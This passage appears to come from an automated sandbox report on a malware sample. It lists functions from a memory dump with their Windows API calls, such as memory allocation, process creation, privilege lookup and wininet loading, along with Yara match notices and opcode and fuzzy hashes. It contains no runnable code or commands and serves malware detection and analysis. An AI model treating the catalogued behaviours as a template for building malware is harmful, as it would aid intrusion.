                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: .z`
                                            • API String ID: 823142352-1441809116
                                            • Opcode ID: 6199db05111b063147845b11c5b95b231fcacf6ab4630b372ac588693a095863
                                            • Instruction ID: 5acd60ac1ed037ecbd8a385e1bc7fe51ce05aa0c49c801cddf2883c319d7b4a5
                                            • Opcode Fuzzy Hash: 6199db05111b063147845b11c5b95b231fcacf6ab4630b372ac588693a095863
                                            • Instruction Fuzzy Hash: 0EE0E2B2254005AFDB08CF88E848CE7B3F9FF88310B20854DF54D83100D630A851CBB4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00578700, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.NTDLL(@=W,?,?,00573D40,00000000,FFFFFFFF), ref: 00578725
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID: @=W
                                            • API String ID: 3535843008-272422971
                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                            • Instruction ID: 497a48b7b7ec36a19dba3fa0e9f1173fafef58fb8f733ef287a4343870bdf6a5
                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                            • Instruction Fuzzy Hash: 92D012752002146BD714EB98DC49E977B6CEF84750F154455BA1C5B242C570F510C6E0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 005787B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00562D11,00002000,00003000,00000004), ref: 005787E9
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                            • Instruction ID: 1e2d9a03437bcafa17bff5b96796d3970363c1588484096cf51f6ba874fd35d7
                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                            • Instruction Fuzzy Hash: 39F015B2200219ABCB18DF89DC85EAB77ADAF88750F118148BE0897241C630F810CBB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 005787AA, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00562D11,00002000,00003000,00000004), ref: 005787E9
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: 1096a8db023035940c505cbddb5e4c2b9618d0d6fa62589438a93f470402c0d4
                                            • Instruction ID: 25e389b2c991a386c1ed4fae873d4aa2031c71eda3889acb719aef42d0850ab6
                                            • Opcode Fuzzy Hash: 1096a8db023035940c505cbddb5e4c2b9618d0d6fa62589438a93f470402c0d4
                                            • Instruction Fuzzy Hash: 01F0FEB22001196FCB14DF95DC95EAB77ADAF88244F158149B9199B242C630E811CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03889780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.934191188.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true
                                            • Associated: 00000007.00000002.934307710.000000000393B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000007.00000002.934319997.000000000393F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d4052344bb56ee9d67e0c37befd8201c0f3947d9d1e25805d9fb21f50027aaa8
                                            • Instruction ID: ca3e979773f55bfb8ec53b87ef3d03f2a53d457f7a2d90695c7458ed1cc41cf4
                                            • Opcode Fuzzy Hash: d4052344bb56ee9d67e0c37befd8201c0f3947d9d1e25805d9fb21f50027aaa8
                                            • Instruction Fuzzy Hash: 5590026921304402E580B199550860A000597D1246F95D456A1009668CCA558C6D6375
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03889FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.934191188.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true
                                            • Associated: 00000007.00000002.934307710.000000000393B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000007.00000002.934319997.000000000393F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 534b17bee0b342d76a3f5b68e31f3d8e9d0129e15d89b76565490cc3c3393c14
                                            • Instruction ID: 81b9968610a2dd942f5b96c915f3621d6e47e8d8486412ca67cfa662dfe6fa9b
                                            • Opcode Fuzzy Hash: 534b17bee0b342d76a3f5b68e31f3d8e9d0129e15d89b76565490cc3c3393c14
                                            • Instruction Fuzzy Hash: 4390027131118802E510A1998504706000597D1245F55C452A1818668D87D58C997176
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03889710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.934191188.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true
                                            • Associated: 00000007.00000002.934307710.000000000393B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000007.00000002.934319997.000000000393F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: c6735b801bd203703bb33a88d1152e5162c026695e83e9cb99341cab8242413c
                                            • Instruction ID: faf445281860f88b05bf732617e08b6f852fc9c858ceb846ed8fdccf3aa1f4d9
                                            • Opcode Fuzzy Hash: c6735b801bd203703bb33a88d1152e5162c026695e83e9cb99341cab8242413c
                                            • Instruction Fuzzy Hash: 1690027120104802E500A5D95508646000597E0345F55D052A6018665EC7A58C997175
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 038896D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.934191188.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true
                                            • Associated: 00000007.00000002.934307710.000000000393B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000007.00000002.934319997.000000000393F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: cc5113d341b3568c81c95e3ee4c52cba579e03abe5e6c74760bb404182af5b35
                                            • Instruction ID: 1c6065c24c2cbd16816e5f9524ad4579fd9fe7673d8d3bc99cca2f7fbfc34be6
                                            • Opcode Fuzzy Hash: cc5113d341b3568c81c95e3ee4c52cba579e03abe5e6c74760bb404182af5b35
                                            • Instruction Fuzzy Hash: 1890027120104C42E500A1994504B46000597E0345F55C057A1118764D8755CC597575
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 038896E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.934191188.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true
                                            • Associated: 00000007.00000002.934307710.000000000393B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000007.00000002.934319997.000000000393F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: eba0308f6102bafe3e8107b3714550f0af61cb4608881d87883b05c5bfb2f95f
                                            • Instruction ID: 369eb2c47b7893f17409b2086decbb6162d84b911ea793cb8ee4ad06a5e7fc0d
                                            • Opcode Fuzzy Hash: eba0308f6102bafe3e8107b3714550f0af61cb4608881d87883b05c5bfb2f95f
                                            • Instruction Fuzzy Hash: 679002712010CC02E510A199850474A000597D0345F59C452A5418768D87D58C997175
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03889650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.934191188.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true
                                            • Associated: 00000007.00000002.934307710.000000000393B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000007.00000002.934319997.000000000393F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: c7cdab74625e3f042456f1be323d7a57fd0c68ab3182cf685ecdcbc7b9debde7
                                            • Instruction ID: 9f0d417f82f0e33bfaa40011e57e553fa28148bcfa3ca1978a5a032c316f43cf
                                            • Opcode Fuzzy Hash: c7cdab74625e3f042456f1be323d7a57fd0c68ab3182cf685ecdcbc7b9debde7
                                            • Instruction Fuzzy Hash: FE90027120508C42E540B1994504A46001597D0349F55C052A10587A4D97658D5DB6B5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03889A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.934191188.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true
                                            • Associated: 00000007.00000002.934307710.000000000393B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000007.00000002.934319997.000000000393F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 49998062755707872a4483513ca0a059fd53d86ffd4c0dd18610aaa783c7bf36
                                            • Instruction ID: 1dd37f75e6bd2c1eb30320b3bcc3ad3aba5e23ee982d3dfd31decf1d5c762f69
                                            • Opcode Fuzzy Hash: 49998062755707872a4483513ca0a059fd53d86ffd4c0dd18610aaa783c7bf36
                                            • Instruction Fuzzy Hash: 3B90026121184442E600A5A94D14B07000597D0347F55C156A1148664CCA558C696575
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03889660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.934191188.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true
                                            • Associated: 00000007.00000002.934307710.000000000393B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000007.00000002.934319997.000000000393F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d7519a2b8e3b31df9edfc0e480d6434a616eca00abd651efe5efa4c0a41641bf
                                            • Instruction ID: 3b750ab67041626454b6e1e530bfa816ca127dc20b809daf1d37205fc3fde28f
                                            • Opcode Fuzzy Hash: d7519a2b8e3b31df9edfc0e480d6434a616eca00abd651efe5efa4c0a41641bf
                                            • Instruction Fuzzy Hash: 8E90027120104C02E580B199450464A000597D1345F95C056A1019764DCB558E5D77F5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 038899A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.934191188.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true
                                            • Associated: 00000007.00000002.934307710.000000000393B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000007.00000002.934319997.000000000393F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 988667cf5b0a0e6916f33d7ad5d7532be93bf5b9382380b7ec5b0cf061373e25
                                            • Instruction ID: 9d13af18df65522869d2856cce6739dafa0d241bcdca5b72ca2b0ea377fbff81
                                            • Opcode Fuzzy Hash: 988667cf5b0a0e6916f33d7ad5d7532be93bf5b9382380b7ec5b0cf061373e25
                                            • Instruction Fuzzy Hash: 729002A134104842E500A1994514B060005D7E1345F55C056E2058664D8759CC5A717A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 038895D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.934191188.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true
                                            • Associated: 00000007.00000002.934307710.000000000393B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000007.00000002.934319997.000000000393F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: cc63674be69362494a2e7c3bcc05d1367b9aef1b94b376fae41cf7d9c06a1bed
                                            • Instruction ID: 03685fb5cb8d8478b452041fceff1c6d0a7c2c31a84f5ca54be7106c555a21d3
                                            • Opcode Fuzzy Hash: cc63674be69362494a2e7c3bcc05d1367b9aef1b94b376fae41cf7d9c06a1bed
                                            • Instruction Fuzzy Hash: 899002A1202044035505B1994514616400A97E0245B55C062E20086A0DC6658C997179
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03889910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.934191188.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true
                                            • Associated: 00000007.00000002.934307710.000000000393B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000007.00000002.934319997.000000000393F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 9775f39e0f2555150b58cb35134140952788323091430f6bd4d1173fb0def9f5
                                            • Instruction ID: 1c5fc83a4e8e80b218a05eccea85d8e83490e237cb849a36daaae5f083eb00be
                                            • Opcode Fuzzy Hash: 9775f39e0f2555150b58cb35134140952788323091430f6bd4d1173fb0def9f5
                                            • Instruction Fuzzy Hash: EB9002B120104802E540B1994504746000597D0345F55C052A6058664E87998DDD76B9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03889540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.934191188.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true
                                            • Associated: 00000007.00000002.934307710.000000000393B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000007.00000002.934319997.000000000393F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: c7687e075563d80b3747a4c11023b0a9b2bf10e3bd7a479278dd487108799523
                                            • Instruction ID: f50f357c716719dcc94de2c7cb6665944af27cd1d907f682f9dc375cd8fe46ee
                                            • Opcode Fuzzy Hash: c7687e075563d80b3747a4c11023b0a9b2bf10e3bd7a479278dd487108799523
                                            • Instruction Fuzzy Hash: 89900265211044031505E5990704507004697D5395355C062F2009660CD7618C696175
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03889840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.934191188.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true
                                            • Associated: 00000007.00000002.934307710.000000000393B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000007.00000002.934319997.000000000393F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7337b9d3566ee6a327364f3940e1432787a8df0821b6835cb5cd20ae9cbeac5e
                                            • Instruction ID: 5babd245e051b6185e6cd343181ffc73f78253c1ec306ae5378629c129770dca
                                            • Opcode Fuzzy Hash: 7337b9d3566ee6a327364f3940e1432787a8df0821b6835cb5cd20ae9cbeac5e
                                            • Instruction Fuzzy Hash: 18900261242085526945F19945045074006A7E0285795C053A2408A60C86669C5EE675
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03889860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.934191188.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true
                                            • Associated: 00000007.00000002.934307710.000000000393B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000007.00000002.934319997.000000000393F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 38455999c34c3c5df6aed9f5a1dddc2b8e289a3d8db00a5b253356e2c352c4dc
                                            • Instruction ID: 33b30df2fa4cccab39bad89cfe3d22e4bb93af7145b8255227bcda13ac112e74
                                            • Opcode Fuzzy Hash: 38455999c34c3c5df6aed9f5a1dddc2b8e289a3d8db00a5b253356e2c352c4dc
                                            • Instruction Fuzzy Hash: ED90027120104813E511A1994604707000997D0285F95C453A1418668D97968D5AB175
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 005772F0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 00577398
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: d48139c1fd4353ddc2497062818fce250212359cc2dd4549e087a48862032cac
                                            • Instruction ID: b2ec1c49886ecdc01f66c5c08e6921369bd166fbb9c2e425c11e3969d7f1b4e6
                                            • Opcode Fuzzy Hash: d48139c1fd4353ddc2497062818fce250212359cc2dd4549e087a48862032cac
                                            • Instruction Fuzzy Hash: 2131A1B5605705ABC711DF68E8A5FABBBB8BF88700F00C51DF61E9B241D730A545DBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 005772EF, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 00577398
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: 0fe96da0707a0007f6b6c8ea6ca445412ddd2de2becb5dce7939868557c4d4f0
                                            • Instruction ID: 7d1125b3194d7db769bb61625211822354f7fcef1c6e53da0ce86e771a53b00c
                                            • Opcode Fuzzy Hash: 0fe96da0707a0007f6b6c8ea6ca445412ddd2de2becb5dce7939868557c4d4f0
                                            • Instruction Fuzzy Hash: 9821B1B1605305ABC710DF64E8A5FABBBB8FF88700F00C419FA1D9B241D774A545DBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 005788D3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00563B93), ref: 0057890D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: .z`
                                            • API String ID: 3298025750-1441809116
                                            • Opcode ID: a9a8ecfbee2766e0642c6fca766734f74ea5d34bf96cf3a2e759190cdf008c92
                                            • Instruction ID: 674ea0c69c2bdde847c833042b92431789f8c8e35f90384bffebd94b98318a1d
                                            • Opcode Fuzzy Hash: a9a8ecfbee2766e0642c6fca766734f74ea5d34bf96cf3a2e759190cdf008c92
                                            • Instruction Fuzzy Hash: 84E068B411474A4FCB10EE59D8808AB3794FFC13047108A5BE8488B313C235C81AC7B0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 005788E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00563B93), ref: 0057890D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: .z`
                                            • API String ID: 3298025750-1441809116
                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                            • Instruction ID: 89cd119e70676356bc962b58bef66407a49cd29ae4bb58373614d2b44d0debae
                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                            • Instruction Fuzzy Hash: 7EE046B1200219ABDB18EF99DC49EA777ACEF88750F018558FE0C5B242C630F910CAF0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 005788A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(&5W,?,00573C9F,00573C9F,?,00573526,?,?,?,?,?,00000000,00000000,?), ref: 005788CD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID: &5W
                                            • API String ID: 1279760036-2495604129
                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                            • Instruction ID: 82d50b4000862fec5ec1c1c1235fe692ad9d74dbbe0cd7e5f24f521b24f9cc27
                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                            • Instruction Fuzzy Hash: 58E012B1200218ABDB18EF99DC45EA777ACAF88650F118558BE085B242C630F910CAB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00567270, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 005672CA
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 005672EB
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: f3663199beabf3b2e139a43e338370e3a84a0ac6ed7f57403b6f9c19571d6667
                                            • Instruction ID: cd453fe3f61e871a4ac2c45c4c149052ae160008c4f20d79ad2c19454227a66d
                                            • Opcode Fuzzy Hash: f3663199beabf3b2e139a43e338370e3a84a0ac6ed7f57403b6f9c19571d6667
                                            • Instruction Fuzzy Hash: AB01A731A8022977E720A6949C07FBE7B6C6B84B51F154114FF04BB1C1E6A4690586F6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0056D451, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetErrorMode.KERNELBASE(00008003,?,?,00567C73,?), ref: 0056D44B
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: f60a6cab54535a480576b26c736a41cf43a02bb0b8e447703aaad9308ddc9911
                                            • Instruction ID: b06ab4a3a09f3553116404a277fa4a7887fb79dc973936d9b14c8cc6bca7e0e6
                                            • Opcode Fuzzy Hash: f60a6cab54535a480576b26c736a41cf43a02bb0b8e447703aaad9308ddc9911
                                            • Instruction Fuzzy Hash: 4E01CC71E5020829EF20AA649C4AFFA7BB9EBD5710F044599F90C97183D7B199808661
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 005789E5, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0056CFB2,0056CFB2,?,00000000,?,?), ref: 00578A70
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 1d418bb68d3e753067e2808a0d5f1340b3d9f7843a9468458c0235b397b3e746
                                            • Instruction ID: 1efc7e9fd137e138370bc8706636fbeff567fda81c22bbef4fa6d882f5006ab0
                                            • Opcode Fuzzy Hash: 1d418bb68d3e753067e2808a0d5f1340b3d9f7843a9468458c0235b397b3e746
                                            • Instruction Fuzzy Hash: BF1139B6600219ABDB14DF89DC85EEB37A9EF88790F118155FE0CA7241DA30E911CBF0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00569B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00569BA2
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                            • Instruction ID: 25f371cad8fce38c5cf747074817b8746890135fcee1677ef411ee03c38069e2
                                            • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                            • Instruction Fuzzy Hash: 0E015EB5D0020EABDB10EAA0EC46F9DB7B8AB94308F008195E90C97241F671EB04DB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00578950, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 005789A4
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction ID: 0f9ef1111ab4c283cc7a5c323b1bef08c8ffffa64a8fefb3d9fa1520499569dd
                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction Fuzzy Hash: 7F01B2B2210108BFCB58DF89DC84EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0057894F, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 005789A4
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: d42d1213b6e9b2bc01a1be01f07d71b183baaa345ebe10ef5ac0b0b6e2e31833
                                            • Instruction ID: f76f3127ce35d209794214bcf27a08318960f009f3bbadffb6b654427c3238a4
                                            • Opcode Fuzzy Hash: d42d1213b6e9b2bc01a1be01f07d71b183baaa345ebe10ef5ac0b0b6e2e31833
